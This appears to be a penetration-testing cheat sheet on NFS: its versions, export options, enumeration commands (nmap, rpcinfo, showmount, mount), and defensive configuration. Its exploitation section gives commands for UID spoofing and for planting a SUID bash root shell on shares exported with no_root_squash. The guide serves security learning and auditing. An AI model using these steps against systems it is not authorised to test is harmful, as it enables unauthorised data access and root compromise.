NFS Enumeration
Overview
Network File System (NFS) is a network file system developed by Sun Microsystems with the same purpose as SMB - to access file systems over a network as if they were local. However, it uses an entirely different protocol and is primarily used between Linux and Unix systems.
Key Characteristics:
Uses ONC-RPC/SUN-RPC protocol on TCP/UDP port 111
Main service runs on TCP/UDP port 2049
Uses External Data Representation (XDR) for system-independent data exchange
No built-in authentication mechanism (relies on RPC protocol options)
Authorization derived from file system information
NFS Versions
NFSv2
Older version supported by many systems, initially operated entirely over UDP
NFSv3
More features including variable file size and better error reporting, not fully compatible with NFSv2 clients
NFSv4
Includes Kerberos, works through firewalls, no longer requires portmappers, supports ACLs, state-based operations, performance improvements and high security. First stateful protocol version
NFSv4.1
Protocol support for cluster server deployments, scalable parallel access (pNFS extension), session trunking/NFS multipathing
NFSv4 Advantages:
Only uses one port (2049) - simplifies firewall configuration
Stateful protocol
Better security features
Kerberos authentication support
Default Configuration
NFS configuration is managed through the /etc/exports file, which contains a table of physical filesystems accessible by clients.
Example /etc/exports:
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)NFS Configuration Options
rw
Read and write permissions
ro
Read only permissions
sync
Synchronous data transfer (slower but safer)
async
Asynchronous data transfer (faster but less safe)
secure
Ports above 1024 will not be used
insecure
Ports above 1024 will be used
no_subtree_check
Disables subdirectory tree checking
root_squash
Maps root UID/GID 0 to anonymous, prevents root access
no_root_squash
All files created by root keep UID/GID 0
nohide
Exports mounted subdirectories with their own entries
Dangerous Settings
β οΈ High-Risk Configurations:
rw
High
Allows write access to shares
insecure
High
Allows ports above 1024 (non-root ports)
no_root_squash
Critical
Preserves root privileges - allows root access
nohide
Medium
Exports mounted subdirectories separately
Enumeration Techniques
1. Port Scanning
# Scan essential NFS ports
nmap -p111,2049 -sV -sC <target>
# Comprehensive NFS scan
nmap -p- --script nfs* <target> -sV2. RPC Information Gathering
# Get RPC service information
nmap -p111 --script rpcinfo <target>
# Alternative RPC enumeration
rpcinfo -p <target>3. NFS-Specific Enumeration
# Discover NFS shares
showmount -e <target>
# Use Nmap NFS scripts
nmap --script nfs-ls,nfs-showmount,nfs-statfs <target> -p20494. NFS Share Mounting
# Create mount point
mkdir /mnt/nfs-share
# Mount NFS share
mount -t nfs <target>:/path/to/share /mnt/nfs-share -o nolock
# Alternative mounting options
mount -t nfs <target>:/path/to/share /mnt/nfs-share -o nolock,vers=35. Content Analysis
# List contents with permissions
ls -la /mnt/nfs-share/
# List with numeric UIDs/GIDs
ls -n /mnt/nfs-share/
# Check file ownership and permissions
stat /mnt/nfs-share/filenameAdvanced Enumeration
Using Nmap NSE Scripts
# Comprehensive NFS enumeration
nmap --script nfs-ls,nfs-showmount,nfs-statfs -p2049 <target>
# NFS vulnerability scanning
nmap --script nfs* -p2049 <target>Manual RPC Enumeration
# Query RPC services
rpcinfo -p <target>
# Specific service queries
rpcinfo -u <target> nfs
rpcinfo -t <target> nfsSecurity Issues and Attack Vectors
1. Authentication Bypass
Issue: NFS relies on UID/GID mapping without proper authentication
Impact: Access to files based on numeric user IDs
Exploitation: Create local users with matching UIDs
2. Privilege Escalation
Issue:
no_root_squashconfiguration preserves root privilegesImpact: Root access to NFS shares
Exploitation: Upload SUID binaries, access sensitive files
3. Information Disclosure
Issue: World-readable shares or misconfigured permissions
Impact: Unauthorized access to sensitive data
Exploitation: Mount shares and browse contents
4. File System Manipulation
Issue: Write permissions on critical directories
Impact: Modify system files, plant backdoors
Exploitation: Upload malicious files, modify configurations
Exploitation Examples
UID/GID Manipulation
# Check file ownership
ls -n /mnt/nfs-share/
# Create local user with matching UID
useradd -u 1000 nfsuser
# Switch to created user
su nfsuser
# Access files with proper permissions
cat /mnt/nfs-share/sensitive-file.txtSUID Binary Upload (when no_root_squash is set)
# Create SUID binary
cp /bin/bash /mnt/nfs-share/rootbash
chmod +s /mnt/nfs-share/rootbash
# Execute from target system
./rootbash -pEnumeration Checklist
Initial Discovery
Share Analysis
Security Assessment
Defensive Measures
Secure Configuration
# Example secure exports entry
/secure/share 192.168.1.0/24(ro,sync,no_subtree_check,root_squash,secure)Best Practices
Use root_squash: Always enable root squashing
Restrict networks: Limit access to specific subnets
Read-only when possible: Use ro for shares that don't need write access
Use secure option: Prevent use of high-numbered ports
Enable sync: Use synchronous writes for data integrity
Regular audits: Monitor NFS configurations and access logs
Monitoring
# Check current NFS connections
netstat -an | grep :2049
# Monitor NFS statistics
nfsstat -s
# Check mounted shares
df -t nfsCleanup
# Unmount NFS share
umount /mnt/nfs-share
# Remove mount point
rmdir /mnt/nfs-shareLast updated